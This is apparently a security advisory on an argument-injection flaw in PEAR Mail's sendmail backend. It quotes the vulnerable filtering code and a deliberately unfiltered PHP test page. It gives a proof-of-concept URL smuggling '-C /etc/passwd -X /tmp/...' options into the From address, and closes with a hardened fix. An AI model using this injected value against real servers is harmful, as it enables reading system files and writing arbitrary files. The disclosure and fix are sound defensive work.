Arbitrary file read/write vulnerability in all of PEAR's Mail functions

The problem is located in Sendmail.php:

......
        if (!isset($from)) {
            return PEAR::raiseError('No from address given.');
        } elseif (strpos($from, ' ') !== false ||
                  strpos($from, ';') !== false ||
                  strpos($from, '&') !== false ||
                  strpos($from, '`') !== false) {
            return PEAR::raiseError('From address specified with dangerous characters.');
        }

        $from = escapeShellCmd($from);
        $mail = @popen($this->sendmail_path . (!empty($this->sendmail_args) ? ' ' . $this->sendmail_args : '') . " -f$from -- $recipients", 'w');
        if (!$mail) {
            return PEAR::raiseError('Failed to open sendmail [' . $this->sendmail_path . '] for execution.');
        }
......

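As the code shows, the filtering of the $from variable is incomplete. Because escapeShellCmd replaces characters such as \ with nothing, the check for spaces can be bypassed, and escapeshellcmd itself does not check whether the value introduces additional arguments, which is what leads to the security problem.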

Vulnerability test:


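<?php
// Test page: builds a mail with PEAR Mail's sendmail backend.
ini_set('include_path', ini_get('include_path') . ':/usr/local/lib/php/PEAR:');
require_once("Mail.php");
// The request parameter "email" is placed into the From header unfiltered.
$from = "From: " . $_REQUEST['email'] . "\r\n";
$to = "xxxxxxx@zzzz.com";
$subj = "subscription request";
$body = "subscribe me";
// Cc and Bcc are not used in this test; define them so the array is valid.
$cc = "";
$bcc = "";
$hdrs = array(
    "To" => $to,
    "Cc" => $cc,
    "Bcc" => $bcc,
    "From" => $from,
    "Subject" => $subj,
);
$body = "test";
$mail =& Mail::factory('sendmail');
$mail->send($to, $hdrs, $body);
?>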

http://www.80sec.com/index.php?1=3&email=xxxxx -C /etc/passwd -X /tmp/wokao zzz@x .com&l=2&1=3

This request shows the vulnerability being exploited.

Vulnerability impact: all PEAR Mail packages
Vulnerability status: vendor notified
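
A hardened way to build the same command line, as an added example that is not PEAR's own code or part of the original advisory: it rejects every whitespace or control character and a leading '-' in each address, then passes the address through escapeshellarg() so it reaches sendmail as a single argument. The helper name build_sendmail_command, the /usr/sbin/sendmail path and the example.com addresses are assumptions made for illustration.

```php
<?php
// Added example, not PEAR's code: build the sendmail command line so that no
// part of an address can turn into an extra option.

// Hypothetical helper: returns the command string, or throws when an address
// could be split into several arguments or read as an option.
function build_sendmail_command(string $sendmailPath, string $from, array $recipients): string
{
    $check = function (string $addr, string $what): string {
        // Reject every whitespace and control byte, not only ' ' (0x20).
        if (preg_match('/[\s\x00-\x1f\x7f]/', $addr)) {
            throw new InvalidArgumentException("$what contains whitespace or control characters");
        }
        // A value that is empty or starts with '-' must never reach the command line.
        if ($addr === '' || $addr[0] === '-') {
            throw new InvalidArgumentException("$what is empty or starts with '-'");
        }
        if (filter_var($addr, FILTER_VALIDATE_EMAIL) === false) {
            throw new InvalidArgumentException("$what is not a valid address");
        }
        // escapeshellarg() quotes the value as a single argument; escapeshellcmd()
        // only escapes shell metacharacters and does not prevent word splitting.
        return escapeshellarg($addr);
    };

    $cmd = escapeshellarg($sendmailPath) . ' -f' . $check($from, 'From address') . ' --';
    foreach ($recipients as $rcpt) {
        $cmd .= ' ' . $check($rcpt, 'Recipient');
    }
    return $cmd;
}

// Constructed inputs: an ordinary sender, then the email value from the test URL above.
$samples = [
    'user@example.com',
    'xxxxx -C /etc/passwd -X /tmp/wokao zzz@x .com',
];
foreach ($samples as $from) {
    try {
        echo build_sendmail_command('/usr/sbin/sendmail', $from, ['list@example.com']), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```

The first sample yields a command with the sender quoted as one argument; the second is rejected before any command string is built.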
